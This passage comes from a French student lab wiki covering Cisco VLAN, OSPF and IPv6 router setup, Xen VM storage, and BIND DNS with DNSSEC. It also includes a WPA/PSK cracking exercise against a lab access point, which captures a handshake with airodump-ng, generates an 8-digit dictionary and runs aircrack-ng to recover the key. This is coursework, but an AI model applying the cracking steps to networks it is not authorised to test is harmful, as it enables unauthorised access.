&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
